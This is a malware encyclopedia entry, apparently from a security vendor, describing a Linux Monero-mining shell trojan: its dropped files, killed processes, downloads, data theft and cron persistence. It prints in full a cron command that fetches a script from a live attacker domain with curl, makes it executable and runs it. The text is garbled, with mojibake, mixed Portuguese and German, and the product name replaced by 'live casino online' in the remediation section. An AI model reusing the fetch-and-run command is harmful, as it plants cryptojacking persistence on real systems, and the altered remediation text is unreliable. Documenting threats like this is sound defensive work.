Trojan.SH.MALXMR.UWEJS
N/A
Linux
Tipo de grayware:
Trojan
Destrutivo:
N?o
Criptografado:
N?o
In the Wild:
Sim
Vis?o geral
Wird m?glicherweise von anderer Malware/Grayware/Spyware von externen Sites heruntergeladen.
L?scht Dateien, so dass Programme und Anwendungen nicht ordnungsgem?? ausgef¨¹hrt werden.
L?scht sich nach der Ausf¨¹hrung selbst.
Detalhes t¨¦cnicos
?bertragungsdetails
Wird m?glicherweise von der folgenden Malware/Grayware/Spyware von externen Sites heruntergeladen:
Installation
Schleust die folgenden Dateien ein und f¨¹hrt sie aus:
- x
- start.pl
Erstellt die folgenden Ordner:
- /var/tmp/.nano
- /tmp/.vd
Andere System?nderungen
L?scht die folgenden Dateien:
- nohup.out
- /tmp/min.sh
- /tmp/min
- /tmp/nohup.out
- /tmp/cron.d
- /var/tmp/.nano
- /{Current Directory}/cron.d
- cron.d
- .bin
- /dev/shm/.bin
- /tmp/.bin
- /dev/shm/monero.tgz
- .vd
- /tmp/.vd
- /tmp/.vd/sslm.tgz
- min*
- {Current Directory}/min*
- /tmp/min*
Prozessbeendigung
Beendet die folgenden Prozesse, wenn sie im Speicher des betroffenen Systems ausgef¨¹hrt werden:
- rand
- rx
- rd
- tsm
- tsm2
- haiduc
- a
- sparky
- sh
- 2238Xae
- b
- f
- i
- p
- y
- rsync
- ps
- go
- x
- s
- b
- run
- idle
- minerd
- crond
- yam
- xmr
- python
- cron
- ntpd
- start
- start.sh
- libssl
- sparky.sh
Download-Routine
Speichert die heruntergeladenen Dateien unter den folgenden Namen:
- /etc/cron.hourly/cron.sh ¡ú detected as Trojan.SH.MALXMR.UWEJT
- /etc/cron.daily/cron.sh ¡ú detected as Trojan.SH.MALXMR.UWEJT
- /var/tmp/.nano/nano.sh ¡ú detected as Trojan.SH.MALXMR.UWEJT
- /dev/shm/monero.tgz
- /tmp/.vd/sslm.tgz
Datendiebstahl
Folgende Daten werden gesammelt:
- Current Directory
- username
- System time and date
- Kernel Information
- Number of Processing Units
- List of Display Interface
Entwendete Daten
Sendet die gesammelten Daten ¨¹ber HTTP-POST an den folgenden URL:
- http://{BLOCKED}ter.com/assets/.style/remote/info.php
Andere Details
Es macht Folgendes:
- It creates the following cron jobs for persistence:
Path: {Current Directory}/cron.d- Schedule: Every 30 minutes
- Command: */30 * * * * /var/tmp/.nano/nano.sh &> /dev/null @reboot /bin/mkdir /var/tmp/.nnao && /usr/bin/curl -s https://upajmeter.com/assets/.style/nano.sh && /bin/chmod +x /var/tmp/.nano/nano.sh && /var/tmp/.nano/nano.sh
L?scht sich nach der Ausf¨¹hrung selbst.
Solu??o
Durchsuchen Sie Ihren Computer mit Ihrem live casino online Produkt, und l?schen Sie Dateien, die als Trojan.SH.MALXMR.UWEJS entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem live casino online Produkt ges?ubert, gel?scht oder in Quarant?ne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarant?ne k?nnen einfach gel?scht werden. Auf dieser finden Sie weitere Informationen.
Participe da nossa pesquisa!